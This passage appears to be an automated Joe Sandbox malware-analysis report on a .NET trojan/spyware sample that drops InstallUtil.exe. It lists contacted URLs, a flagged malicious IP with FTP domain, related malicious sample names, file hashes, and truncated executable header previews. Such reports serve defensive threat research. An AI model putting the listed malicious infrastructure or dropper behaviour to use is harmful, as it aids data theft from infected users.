                                                http://www.jiyu-kobo.co.jp/jp/InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comlInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.com.FInstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.founder.com.cn/cn/InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cnInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comdRInstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.founder.com.cn/cnhicInstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.carterandcone.comwInstallUtil.exe, 0000000C.00000003.455586589.0000000005D46000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fontbureau.commInstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.comoInstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/adnlInstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.carterandcone.comouInstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comituInstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.google.com/accounts/serviceloginvbc.exefalse
                                                        		high
                                                        http://www.fontbureau.comuInstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fontbureau.comm(InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://www.jiyu-kobo.co.jp/cInstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.google.com/ypBoHI5G3x.exe, 00000001.00000002.447965365.0000000003121000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://ns.ado/1ypBoHI5G3x.exe, 00000001.00000003.347743311.000000000736F000.00000004.00000001.sdmp, ypBoHI5G3x.exe, 00000001.00000003.446695266.0000000007376000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          142.250.185.196
                                                          		www.google.comUnited States
                                                          		15169GOOGLEUSfalse
                                                          45.141.152.18
                                                          		ftp.vngpack.comRomania
                                                          		9009M247GBtrue

                                                          Private

                                                          IP
                                                          192.168.2.1

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:454641
                                                          Start date:27.07.2021
                                                          Start time:11:11:43
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 13m 4s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:ypBoHI5G3x (renamed file extension from none to exe)
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:24
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.phis.troj.spyw.evad.winEXE@7/5@3/3
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 4.6% (good quality ratio 4.4%)
                                                          • Quality average: 84.2%
                                                          • Quality standard deviation: 25%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded IPs from analysis (whitelisted): 52.147.198.201, 23.211.6.115, 13.88.21.125, 131.253.33.200, 13.107.22.200, 52.255.188.83, 20.82.210.154, 20.54.110.249, 67.27.158.126, 8.253.95.249, 8.248.115.254, 67.26.75.254, 67.27.158.254, 40.112.88.60, 20.50.102.62, 80.67.82.235, 80.67.82.211, 23.211.4.86, 20.82.209.183
                                                          • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          11:12:55API Interceptor211x Sleep call for process: ypBoHI5G3x.exe modified
                                                          11:13:44API Interceptor5x Sleep call for process: InstallUtil.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          45.141.152.18Confirmarea platii.pdf.exeGet hashmaliciousBrowse
                                                          • alfawood.us/xsclk/index.php
                                                          Confirmarea platii.pdf.exeGet hashmaliciousBrowse
                                                          • alfawood.us/mkdgs/index.php
                                                          e-dekont.html.exeGet hashmaliciousBrowse
                                                          • alfawood.us/mkdgs/index.php
                                                          Credit Advice -TT6635993652908.PDF.exeGet hashmaliciousBrowse
                                                          • alfawood.us/mkdgs/index.php
                                                          Dekont.pdf.exeGet hashmaliciousBrowse
                                                          • alfawood.us/xsclk/index.php
                                                          Dekont.pdf.exeGet hashmaliciousBrowse
                                                          • blkgrupdoom.info/scgn/index.php
                                                          e-dekont.html.exeGet hashmaliciousBrowse
                                                          • blkgrupdoom.info/scgn/index.php
                                                          Dekont.pdf.exeGet hashmaliciousBrowse
                                                          • blkgrupdoom.info/scgn/index.php

                                                          Domains

                                                          No context

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          M247GB82658.exeGet hashmaliciousBrowse
                                                          • 45.141.152.18
                                                          lLc1G9C259Get hashmaliciousBrowse
                                                          • 185.206.229.147
                                                          vTHj1xits9Get hashmaliciousBrowse
                                                          • 38.206.10.73
                                                          cNqgk3ITHSGet hashmaliciousBrowse
                                                          • 38.207.37.118
                                                          nNb9qLGPaOGet hashmaliciousBrowse
                                                          • 185.158.248.209
                                                          2N1tt5eaCnGet hashmaliciousBrowse
                                                          • 161.123.233.98
                                                          AttachedWaybill.exeGet hashmaliciousBrowse
                                                          • 37.120.138.210
                                                          UAbJbUWQVk.exeGet hashmaliciousBrowse
                                                          • 89.45.4.101
                                                          NHnpjXX0sbGet hashmaliciousBrowse
                                                          • 196.17.120.85
                                                          Paidcheck.pdf.exeGet hashmaliciousBrowse
                                                          • 217.138.212.57
                                                          List_to_clear_62237.xlsmGet hashmaliciousBrowse
                                                          • 5.61.62.219
                                                          List_to_clear_62237.xlsmGet hashmaliciousBrowse
                                                          • 5.61.62.219
                                                          87597.exeGet hashmaliciousBrowse
                                                          • 45.141.152.18
                                                          NJrrXRv8zVGet hashmaliciousBrowse
                                                          • 196.19.8.206
                                                          DpuO7oic9y.exeGet hashmaliciousBrowse
                                                          • 86.106.143.143
                                                          download.dat.exeGet hashmaliciousBrowse
                                                          • 194.187.251.163
                                                          WindowsFormsApp1.exeGet hashmaliciousBrowse
                                                          • 194.187.251.163
                                                          file2.exeGet hashmaliciousBrowse
                                                          • 141.98.102.243
                                                          Anarchy_Client.exeGet hashmaliciousBrowse
                                                          • 77.243.181.86
                                                          2N9Nc0H82F.exeGet hashmaliciousBrowse
                                                          • 37.120.206.86

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          54328bd36c14bd82ddaa0c04b25ed9adhcpUDQyVUZ.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          000100049000TK.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          000900049000T2000.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          PO#JFUB0002 4QjPQ2oE-pdf.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          invoice.02 Nazih El Chouli.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          tiG7noOyfw.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          DHL Notification-pdf.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          riwWTzYyhX.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          jGMOFmyhHT.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          triage_dropped_file.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          PAYMENT VOUCHER096685_pdf.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          PO LS632911DX.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          UPS Anfrageformular 1.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          INVOICE RECEIPT NO253334.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          Drw3274-pdf.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          ZJWRjB35qc.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          LF4fOmIcwv.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          d3e7114fb62aee098ae453d316cd3601c8cba87e6e6a1.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          K5GDSm1DpM.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196
                                                          ifJoPwvs7o.exeGet hashmaliciousBrowse
                                                          • 142.250.185.196

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          C:\Users\user\AppData\Local\Temp\InstallUtil.exehcpUDQyVUZ.exeGet hashmaliciousBrowse
                                                            Payment Slip.exeGet hashmaliciousBrowse
                                                              OrderConfirmation23072021.exeGet hashmaliciousBrowse
                                                                Inv-04_PDF.vbsGet hashmaliciousBrowse
                                                                  Overdue payment_20218423384940404043.exeGet hashmaliciousBrowse
                                                                    Inv-04_PDF.vbsGet hashmaliciousBrowse
                                                                      Nuovo ordine .exeGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.generic.ml.15285.exeGet hashmaliciousBrowse
                                                                          HPE#0025_PDF.vbsGet hashmaliciousBrowse
                                                                            GH5mpZkbYZ.exeGet hashmaliciousBrowse
                                                                              RFQ_20210715 & PO#2021.exeGet hashmaliciousBrowse
                                                                                ConsoleApp5.exeGet hashmaliciousBrowse
                                                                                  QuoteGMC828300912883755PDF.exeGet hashmaliciousBrowse
                                                                                    QuoteGMC77399940102334PDF.exeGet hashmaliciousBrowse
                                                                                      wanda.exeGet hashmaliciousBrowse
                                                                                        Statement SKBMT 09218.exeGet hashmaliciousBrowse
                                                                                          INOVICE -Reconciliation.exeGet hashmaliciousBrowse
                                                                                            sGwZBR8YeX.exeGet hashmaliciousBrowse
                                                                                              8nkNRwtNfA.exeGet hashmaliciousBrowse
                                                                                                KwS2xupF5j.exeGet hashmaliciousBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ypBoHI5G3x.exe.log
                                                                                                  Process:C:\Users\user\Desktop\ypBoHI5G3x.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1402
                                                                                                  Entropy (8bit):5.338819835253785
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4K5AE4Kzr7K84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoesX3:MIHK5HKXE1qHbHK5AHKzvKviYHKhQnoe
                                                                                                  MD5:F2152F0304453BCFB93E6D4F93C3F0DC
                                                                                                  SHA1:DD69A4D7F9F9C8D97F1DF535BA3949E9325B5A2F
                                                                                                  SHA-256:5A4D59CD30A1AF620B87602BC23A3F1EFEF792884053DAE6A89D1AC9AAD4A411
                                                                                                  SHA-512:02402D9EAA2DF813F83A265C31D00048F84AD18AE23935B428062A9E09B173B13E93A3CACC6547277DA6F937BBC413B839620BA600144739DA37086E03DD8B4F
                                                                                                  Malicious:true
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Co
                                                                                                  C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                                  Process:C:\Users\user\Desktop\ypBoHI5G3x.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):41064
                                                                                                  Entropy (8bit):6.164873449128079
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:FtpFVLK0MsihB9VKS7xdgE7KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+sPZTd:ZBMs2SqdD86Iq8gZZFyViML3an
                                                                                                  MD5:EFEC8C379D165E3F33B536739AEE26A3
                                                                                                  SHA1:C875908ACBA5CAC1E0B40F06A83F0F156A2640FA
                                                                                                  SHA-256:46DEE184523A584E56DF93389F81992911A1BA6B1F05AD7D803C6AB1450E18CB
                                                                                                  SHA-512:497847EC115D9AF78899E6DC20EC32A60B16954F83CF5169A23DD3F1459CB632DAC95417BD898FD1895C9FE2262FCBF7838FCF6919FB3B851A0557FBE07CCFFA
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: hcpUDQyVUZ.exe, Detection: malicious, Browse
                                                                                                  • Filename: Payment Slip.exe, Detection: malicious, Browse
                                                                                                  • Filename: OrderConfirmation23072021.exe, Detection: malicious, Browse
                                                                                                  • Filename: Inv-04_PDF.vbs, Detection: malicious, Browse
                                                                                                  • Filename: Overdue payment_20218423384940404043.exe, Detection: malicious, Browse
                                                                                                  • Filename: Inv-04_PDF.vbs, Detection: malicious, Browse
                                                                                                  • Filename: Nuovo ordine .exe, Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.generic.ml.15285.exe, Detection: malicious, Browse
                                                                                                  • Filename: HPE#0025_PDF.vbs, Detection: malicious, Browse
                                                                                                  • Filename: GH5mpZkbYZ.exe, Detection: malicious, Browse
                                                                                                  • Filename: RFQ_20210715 & PO#2021.exe, Detection: malicious, Browse
                                                                                                  • Filename: ConsoleApp5.exe, Detection: malicious, Browse
                                                                                                  • Filename: QuoteGMC828300912883755PDF.exe, Detection: malicious, Browse
                                                                                                  • Filename: QuoteGMC77399940102334PDF.exe, Detection: malicious, Browse
                                                                                                  • Filename: wanda.exe, Detection: malicious, Browse
                                                                                                  • Filename: Statement SKBMT 09218.exe, Detection: malicious, Browse
                                                                                                  • Filename: INOVICE -Reconciliation.exe, Detection: malicious, Browse
                                                                                                  • Filename: sGwZBR8YeX.exe, Detection: malicious, Browse
                                                                                                  • Filename: 8nkNRwtNfA.exe, Detection: malicious, Browse
                                                                                                  • Filename: KwS2xupF5j.exe, Detection: malicious, Browse
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..h>...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s
                                                                                                  C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2
                                                                                                  Entropy (8bit):1.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: ..
                                                                                                  C:\Users\user\AppData\Roaming\pid.txt
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):1.5
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:g:g
                                                                                                  MD5:198DD5FB9C43B2D29A548F8C77E85CF9
                                                                                                  SHA1:A3FE38AAB7B1CEF4210C0BE9EF8A705628CCE604
                                                                                                  SHA-256:B8BAA797B73F2F1B7A1A44EA3B325767BAF1126B0D2F76FE85C8EECB2306B118
                                                                                                  SHA-512:F0EBAE367BC5C77F38E6774B194CD51F8A7539A6FD5E6FEA4F05D1113C42C08159858461D81EB19223F9B70274602DE326EC31DE9DB75F67AB18D5744C76765E
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 6456
                                                                                                  C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):52
                                                                                                  Entropy (8bit):4.23542415146063
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:oNN+E2J5xAIOWRxRI0dAn:oNN723f5RndA
                                                                                                  MD5:B1373E3FE4C9899F688965D763C0879E
                                                                                                  SHA1:E1FB74A3CBBADD75ABEFAC442252C808AA248DD0
                                                                                                  SHA-256:E93F295284100AF6C668750D6050487FC5766080B0934D0FF66546CB72DB6B71
                                                                                                  SHA-512:3AA7A57E22834AB0A3622A4D2EE2A6658CA57EB9AFEDE9BF3422466032C837E9274E9AD82E36B5D833E3BCDA846018503F21E561C730627DA4EC84CAD4768371
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):6.346408618906811
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  File name:ypBoHI5G3x.exe
                                                                                                  File size:1287680
                                                                                                  MD5:08d679d4b9a12137756cc9244bd6f017
                                                                                                  SHA1:580c29bc356057d76873c9c453ed466e1024b7f2
                                                                                                  SHA256:047f33e6f83796d9fc056d7006a6e8ef69696d63eceb29fb1592bb13a62e79bf
                                                                                                  SHA512:e6293a802a6f539be11df5f6d83ee113ad98d8e5566d59810a18359ff0756eabe2b10f4c8bbd1e17222aaf45400b8a89d33f0e5786418347dc5213b79d8d7116
                                                                                                  SSDEEP:24576:1pMP/pBvygA8z+uhHJQNmR3X2rhK1+pSRs/N:1pMt3qu3H261Rs/N
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..4............................~.... ........@.. ....................................`................................

                                                                                                  File Icon

                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x53bb7e
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                  Time Stamp:0x34EEBD63 [Sat Feb 21 11:41:23 1998 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
